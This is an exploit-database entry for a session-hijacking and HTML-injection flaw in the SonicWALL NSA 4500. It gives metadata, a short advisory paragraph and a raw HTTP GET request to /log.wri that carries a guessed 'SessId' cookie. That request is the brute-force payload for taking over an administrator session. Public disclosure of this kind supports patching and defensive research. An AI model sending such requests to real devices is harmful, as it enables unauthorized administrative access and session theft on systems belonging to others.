[] NeoSense

SonicWALL - 'SessId' Cookie Brute Force / Admin Session Hijacking

Author: Hugo Vazquez
type: remote
platform: hardware
port: 
date_added: 2011-10-04 
date_updated: 2019-03-28 
verified: 1 
codes: OSVDB-76147 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/49930/info

SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability.

Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.

GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111